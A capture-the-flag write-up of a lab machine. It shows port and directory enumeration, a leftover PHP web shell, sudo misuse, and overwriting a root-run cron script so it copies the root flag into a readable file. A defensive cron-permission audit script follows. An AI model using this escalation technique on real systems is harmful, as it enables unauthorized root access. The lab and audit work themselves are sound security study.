Summary

  • Do some simple HTTP enumeration to find a custom PHP script
  • Use the phpbash.php script to grab the user and root flags

First, I start with an nmap scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-16 15:48 EDT
Nmap scan report for 10.10.10.68
Host is up (0.053s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.28 seconds


Only one port this time. Navigating to the webpage I see a nice custom site. A quick look around doesn't reveal anything obvious.

Running gobuster reveals some directories.

/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)


Quite a few options, but the one that is interesting to us is the /dev directory. Navigating to it I see two files: phpbash.min.php and phpbash.php.

It doesn't matter which file you choose; both of them give you a custom bash-style shell written in PHP.

At this point you can grab the user flag located in /user/arrexel.

Now it is time to get the root flag. Running a quick sudo -l, I see that I can run sudo as the user scriptmanager.

www-data@bashed:/var/www/html/dev# sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL


Doing some basic enumeration around the box I noticed a strange directory, /scripts, which is not there by default. A quick permissions check reveals that the directory is indeed owned by the user scriptmanager. As www-data I can see there are two files in there, but I am unable to read them. This is where I will use scriptmanager's sudo privileges.

www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.txt
testing 123!

Looking at both files I can conclude that there is probably a process executing test.py, which writes its output to test.txt.

What I am going to do is edit the test.py script to copy the contents of root.txt into test.txt so I can then read it. This can be achieved with the short script below.

# Overwrite test.txt with the first line of /root/root.txt
f = open("test.txt", "w")
r = open("/root/root.txt", "r")
re = r.readline()
f.write(re)
r.close()
f.close()

Now I wait for the process to execute the new script, and if you did everything correctly then you should be able to get the root flag by reading /scripts/test.txt.
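From the defender's side, the weakness behind this escalation is a root-run cron entry whose script a non-root user can modify. The following audit script is an added example, not part of the original writeup or the box: it parses system crontab lines and flags root commands whose script paths are owned by a non-root user or are group/world writable. The crontab text and ownership table are constructed samples; stat_from_fs is the real lookup you would plug in on a live host.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample of /etc/crontab-style lines (user field present).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/1 * * * * root python /scripts/test.py
0 3 * * *   root /usr/local/bin/backup.sh
17 * * * *  root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed stand-in for os.stat(): path -> (owner uid, permission bits).
SAMPLE_STAT: Dict[str, Tuple[int, int]] = {
    "/scripts/test.py": (1001, 0o644),        # owned by an unprivileged user
    "/usr/local/bin/backup.sh": (0, 0o755),  # root-owned, not group/world writable
}

# Five schedule fields, then the user, then the command.
CRON_LINE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def script_paths(command: str) -> List[str]:
    """Absolute paths mentioned anywhere in the cron command (interpreter args included)."""
    return [tok for tok in command.split() if tok.startswith("/")]

def risky_entries(crontab_text: str,
                  stat_fn: Callable[[str], Optional[Tuple[int, int]]]) -> List[Tuple[str, str, str]]:
    """Return (user, path, reason) for each root cron command whose script a
    non-root user could modify: owned by non-root, or group/world writable."""
    findings = []
    for line in crontab_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m or m.group("user") != "root":
            continue
        for path in script_paths(m.group("cmd")):
            info = stat_fn(path)
            if info is None:  # path unknown to stat_fn: nothing to check
                continue
            uid, mode = info
            if uid != 0:
                findings.append(("root", path, f"owned by uid {uid}, not root"))
            elif mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(("root", path, f"group/world writable (mode {mode:o})"))
    return findings

def stat_from_sample(path: str) -> Optional[Tuple[int, int]]:
    return SAMPLE_STAT.get(path)

def stat_from_fs(path: str) -> Optional[Tuple[int, int]]:
    """Real lookup for a live host: owner uid and permission bits, or None if missing."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (st.st_uid, stat.S_IMODE(st.st_mode))

if __name__ == "__main__":
    for user, path, reason in risky_entries(SAMPLE_CRONTAB, stat_from_sample):
        print(f"[!] {user} cron runs {path}: {reason}")
```

On a real host, pass the contents of /etc/crontab and /etc/cron.d/* together with stat_from_fs; the /scripts/test.py entry above is exactly the pattern this box relies on.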